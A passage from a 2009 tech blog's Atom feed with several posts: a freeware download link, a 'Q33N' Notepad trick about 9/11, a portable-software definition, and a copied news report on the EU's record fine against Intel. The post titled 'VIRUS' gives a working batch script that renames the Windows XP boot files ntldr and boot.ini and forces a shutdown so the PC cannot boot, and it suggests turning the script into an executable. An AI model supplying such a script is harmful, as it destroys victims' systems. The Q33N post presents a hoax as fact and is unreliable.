500MHz and      higher or compatible&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;RAM: 256 MB&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Disk space: 15 MB&lt;o:p&gt;&lt;/o:p&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;DOWNLOAD LINK&lt;/span&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.productname 	{mso-style-name:product_name;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span class="productname"&gt;&lt;a href="http://www.ziddu.com/download/4860290/DiskMonitorFree.exe.html"&gt;http://www.ziddu.com/download/4860290/DiskMonitorFree.exe.html&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-9181839247279213968?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/9181839247279213968/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/normal-0-false-false-false_22.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/9181839247279213968'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/9181839247279213968'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/normal-0-false-false-false_22.html' title='HARD DISK MONITORING SOFTWARE'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/ShcUwhqV4nI/AAAAAAAAAKw/H3YKt20WZG4/s72-c/zzzzzzzzz.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5630047412702733128</id><published>2009-05-20T06:23:00.000-07:00</published><updated>2009-05-20T06:25:02.486-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>NOTEPAD "world trade centre trick".. ::</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/ShQEcX0KBZI/AAAAAAAAAKo/HfWhH9OACGk/s1600-h/notepad-icon.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 200px;" src="http://2.bp.blogspot.com/_T53992hHLOM/ShQEcX0KBZI/AAAAAAAAAKo/HfWhH9OACGk/s400/notepad-icon.jpg" alt="" id="BLOGGER_PHOTO_ID_5337896343816504722" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="text-align: center;" align="center"&gt;&lt;b&gt;Did you know that the flight number of the plane that had hit WTC ...on&lt;br /&gt;9/11 was Q33N ....Open your Notepad in &lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;ur&lt;/st1:city&gt;&lt;/st1:place&gt; computer and type the flight&lt;br /&gt;number i.e Q33N... Increase the Font Size to 72, Change the Font to&lt;br /&gt;Wingdings. U will be amazed by the findings&lt;/b&gt;.&lt;/p&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5630047412702733128?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5630047412702733128/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/notepad-world-trade-centre-trick.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5630047412702733128'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5630047412702733128'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/notepad-world-trade-centre-trick.html' title='NOTEPAD &quot;world trade centre trick&quot;.. ::'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/ShQEcX0KBZI/AAAAAAAAAKo/HfWhH9OACGk/s72-c/notepad-icon.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-2860242448666137276</id><published>2009-05-19T03:22:00.000-07:00</published><updated>2009-05-19T03:25:48.211-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKING'/><title type='text'>VIRUS</title><content type='html'>&lt;span style="font-style: italic;"&gt;This virus was written by one of my frnds on a orkut forum so thanks to him here it goes&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ok here's what the virus does...&lt;br /&gt;But, first&lt;br /&gt;BE EXTREMELY CAREFUL.. I WOULD SERIOUSLY ADVICE YOU TO NOT TO RUN THIS ON YOUR PC ATLEAST&lt;br /&gt;I TAKE NO RESPONSIBILITY OF HOW YOU USE THIS CODE. THIS IS ONLY FOR TRAINING. NOTHING ELSE&lt;br /&gt;my virus uses batch processing to rename the xp booting file ntldr as ntls. and boot.ini as boot.int.. and displays a message for 4 seconds. and automatically shuts down your PC (forever )..&lt;br /&gt;Open notepad. and paste the following code.. save it as &lt;something&gt;.bat ... any file name with extension bat ..&lt;br /&gt;@echo off&lt;br /&gt;attrib c:\autoexec.bat -s -h -r&lt;br /&gt;ren c:\autoexec.bat aute.bit&lt;br /&gt;attrib c:\ntldr -s -h -r&lt;br /&gt;ren c:\ntldr ntls&lt;br /&gt;attrib c:\boot.ini -s -h -r&lt;br /&gt;ren c:\boot.ini bot.int&lt;br /&gt;@echo off&lt;br /&gt;shutdown -s -t 4 -c "Your Computer is Doomed!!!"&lt;br /&gt;you can add many variations to it.. You can also use any BATCH to EXE converter to convert your file into executable one so t&lt;/something&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-2860242448666137276?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/2860242448666137276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/virus.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2860242448666137276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2860242448666137276'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/virus.html' title='VIRUS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-3972336459679229940</id><published>2009-05-14T07:48:00.000-07:00</published><updated>2009-05-14T08:01:44.177-07:00</updated><title type='text'>PORTABLE SOFTWARES</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SgwxvktVkdI/AAAAAAAAAKg/dZCGsrBiL3c/s1600-h/751314c3d1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 400px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SgwxvktVkdI/AAAAAAAAAKg/dZCGsrBiL3c/s400/751314c3d1.jpg" alt="" id="BLOGGER_PHOTO_ID_5335694351904641490" border="0" /&gt;&lt;/a&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Cayush%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1779982087; 	mso-list-template-ids:-1720796002;} @list l0:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;Portable software is a class of software that is suitable for use on portable drives such as a USB (thumb) drive or ipod or Palm PDA with "drive mode", although any external hard drive can be used. &lt;sup&gt;[1]&lt;/sup&gt; &lt;sup&gt;[2]&lt;/sup&gt; The concept of carrying one's favored applications, utilities, and files on a portable drive for use on any computer is one which has evolved considerably in recent years.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;Programs in this category (also known as &lt;i&gt;portable applications&lt;/i&gt;) are typically 'lite' versions of their parent software, but there are many exceptions.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;To be considered portable, for purpose of this list, a software program must:&lt;/span&gt;&lt;/p&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;Not require any kind of formal      installation onto a computer's permanent storage device to be executed,      and can be stored on a removable storage device such as USB flash drive,      enabling it to be used on multiple computers.&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;Settings are stored with, and      can be carried around with, the software (i.e., they are written to the USB      drive). If the registry is used to store settings, the application's      configuration isn't portable, and must be set up on every PC it is used on&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size:130%;"&gt;Leaves a zero (or near-zero)      "footprint" on any PC it's run on after being used. i.e., All      temporary files/registry settings should be removed once the program has      exited, and files created by the user can be saved directly to the same      removable media as the application is stored on.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;Generally, smaller utility/toolkit software is inherently fairly portable; though larger applications are sometimes changed in order to allow a portable versions to be released (e.g., Opera USB).&lt;/span&gt;&lt;/p&gt;  &lt;span style="font-size:130%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-3972336459679229940?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/3972336459679229940/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/portable-softwares.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3972336459679229940'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3972336459679229940'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/portable-softwares.html' title='PORTABLE SOFTWARES'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/SgwxvktVkdI/AAAAAAAAAKg/dZCGsrBiL3c/s72-c/751314c3d1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-6947734811965027882</id><published>2009-05-13T07:21:00.001-07:00</published><updated>2009-05-13T07:24:39.090-07:00</updated><title type='text'>EU slaps a record fine on Intel</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SgrXlNAAOkI/AAAAAAAAAKY/jUgsf-I93O8/s1600-h/IntelAMD.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SgrXlNAAOkI/AAAAAAAAAKY/jUgsf-I93O8/s400/IntelAMD.jpg" alt="" id="BLOGGER_PHOTO_ID_5335313742718581314" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I found this interesting article while surfing .ALl tech lovers please go through this I am sure it will interest you&lt;br /&gt;&lt;p class="caption"&gt;EU Competition Commissioner Neelie Kroes says Intel 'took advantage of their position'&lt;/p&gt;&lt;!-- END - caption --&gt;   &lt;!-- end of the embedded player component --&gt;  &lt;!-- END of Inline Embedded Media --&gt; &lt;!-- S SF --&gt;&lt;p class="first"&gt;&lt;b&gt;Computer chipmaker Intel has been fined a record 1.06bn euros ($1.45bn; £948m) by the European Commission for anti-competitive practices.&lt;/b&gt;&lt;/p&gt;&lt;p&gt;It dwarfs the 497m euro fine levied on Microsoft in 2004 for abusing its dominant market position. &lt;/p&gt;&lt;p&gt;The Commission found that between 2002 and 2007, Intel had paid manufacturers and a retailer to favour its chips over those of Advanced Micro Devices (AMD). &lt;/p&gt;&lt;p&gt;Intel has announced that it will appeal against the verdict. &lt;/p&gt;&lt;!-- E SF --&gt;&lt;p&gt;"Intel takes exception to this decision. We believe the decision is wrong and ignores the reality of a highly competitive microprocessor market," Intel chief executive Paul Otellini said. &lt;/p&gt;&lt;p&gt;"There has been absolutely zero harm to consumers. Intel will appeal," he added. &lt;/p&gt;&lt;p&gt;The fine was welcomed by AMD, which had lodged complaints in 2000, 2003 and 2006. &lt;/p&gt;&lt;p&gt;"The EU decision will shift the power from an abusive monopolist to computer makers, retailers and above all PC consumers," said Giuliano Meroni, AMD's European president. &lt;/p&gt;&lt;p&gt;&lt;b&gt;'Sustained violation'&lt;/b&gt;&lt;/p&gt;&lt;p&gt;The Commission said that Acer, Dell, HP, Lenovo and NEC had been given hidden rebates if they only used Intel chips. &lt;/p&gt;                    &lt;!-- S IBOX --&gt;     &lt;table align="right" border="0" cellpadding="0" cellspacing="0" width="231"&gt;     &lt;tbody&gt;&lt;tr&gt;                &lt;td width="5"&gt;&lt;img src="http://newsimg.bbc.co.uk/shared/img/o.gif" alt="" border="0" vspace="0" width="5" height="1" hspace="0" /&gt;&lt;/td&gt;                &lt;td class="sibtbg"&gt;                                                                                               &lt;div&gt;     &lt;div class="mva"&gt;    &lt;img src="http://newsimg.bbc.co.uk/nol/shared/img/v3/start_quote_rb.gif" alt="" border="0" width="24" height="13" /&gt;    &lt;b&gt;It is a major decision that shows the Commission is serious about curtailing abusive behaviour of dominant companies&lt;/b&gt;   &lt;img src="http://newsimg.bbc.co.uk/nol/shared/img/v3/end_quote_rb.gif" alt="" align="right" border="0" vspace="0" width="23" height="13" /&gt;&lt;br /&gt; &lt;/div&gt;         &lt;/div&gt;                                                                     &lt;div class="mva"&gt;  &lt;div&gt;David Anderson, lawyer, Berwin Leighton Paisner.&lt;/div&gt;   &lt;/div&gt;                                    &lt;/td&gt;            &lt;/tr&gt;     &lt;/tbody&gt;&lt;/table&gt;             &lt;!-- E IBOX --&gt;          &lt;p&gt;It also found that Media Saturn, which owns Europe's biggest consumer electronics retailer Media Markt, had been given money so that it would only sell computers containing Intel chips. &lt;/p&gt;&lt;p&gt;"Intel has harmed millions of European consumers by deliberately acting to keep competitors out of the market for computer chips for many years," said Competition Commissioner Neelie Kroes. &lt;/p&gt;&lt;p&gt;"Such a serious and sustained violation of the EU's antitrust rules cannot be tolerated." &lt;/p&gt;&lt;p&gt;Last year, Intel made 80.5% of the microprocessors in PCs, while AMD made 12% of them. &lt;/p&gt;&lt;p&gt;The Commission has also ordered Intel "to cease the illegal practices immediately to the extent that they are still ongoing". &lt;/p&gt;&lt;p&gt;In addition to providing rebates to manufacturers that bought almost entirely Intel products, the Commission found that the chipmaker had paid them to postpone or cancel the launch of specific products based on AMD chips. &lt;/p&gt;&lt;p&gt;&lt;b&gt;'Wall of resistance'&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Ms Kroes joked in her own news conference that Intel would now have to change its latest advertising slogan from "sponsors of tomorrow" to "the sponsor of the European taxpayer". &lt;/p&gt;&lt;p&gt;Both Intel and AMD are based in California. Intel has 83,900 staff worldwide and has a market value of $85.4bn. &lt;/p&gt;&lt;p&gt;AMD employs about 11,000 people and has a market value of $2.6bn. &lt;/p&gt;&lt;p&gt;"Despite its strong defence, Intel is facing a wall of regulatory resistance to its business practices around the world, with antitrust infringement decisions against it now in Japan, Korea, and the EU, while the US authorities are investigating Intel as well," said David Anderson, a lawyer at Berwin Leighton Paisner. &lt;/p&gt;&lt;p&gt;"It is a major decision that shows the Commission is serious about curtailing abusive behaviour of dominant companies, especially in the high-tech sector." &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-6947734811965027882?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/6947734811965027882/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/eu-slaps-record-fine-on-intel.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6947734811965027882'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6947734811965027882'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/eu-slaps-record-fine-on-intel.html' title='EU slaps a record fine on Intel'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SgrXlNAAOkI/AAAAAAAAAKY/jUgsf-I93O8/s72-c/IntelAMD.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-2694387007082795324</id><published>2009-05-10T07:22:00.000-07:00</published><updated>2009-05-10T07:26:18.125-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>Get most from GOOGLE search</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/Sgbjehbt2NI/AAAAAAAAAKQ/WGlVJkooTkY/s1600-h/mothersday09.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 276px; height: 120px;" src="http://4.bp.blogspot.com/_T53992hHLOM/Sgbjehbt2NI/AAAAAAAAAKQ/WGlVJkooTkY/s400/mothersday09.gif" alt="" id="BLOGGER_PHOTO_ID_5334200922177132754" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta 